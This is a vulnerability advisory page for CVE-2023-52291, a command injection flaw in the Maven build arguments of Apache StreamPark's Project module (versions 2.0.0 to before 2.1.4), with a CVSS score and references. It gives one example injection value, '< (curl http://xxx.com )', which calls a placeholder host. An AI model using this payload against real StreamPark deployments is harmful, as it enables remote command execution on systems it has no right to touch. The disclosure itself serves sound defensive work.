CVE-2023-52291
Description
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args “<” operator causes command injection. e.g : “< (curl http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4, The "<" operator will blocked。
CVSS Details
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L Threat Intelligence
Weaknesses 1
Affected Products 1
| Vendor | Product | Version | Range |
|---|---|---|---|
| apache | streampark | * | ≥2.0.0 – <2.1.4 |
References 2
- openwall.com http://www.openwall.com/lists/oss-security/2024/07/17/1
- lists.apache.org https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf
Remediation
No remediation data recorded yet
Check vendor advisories and the NVD entry for patch availability.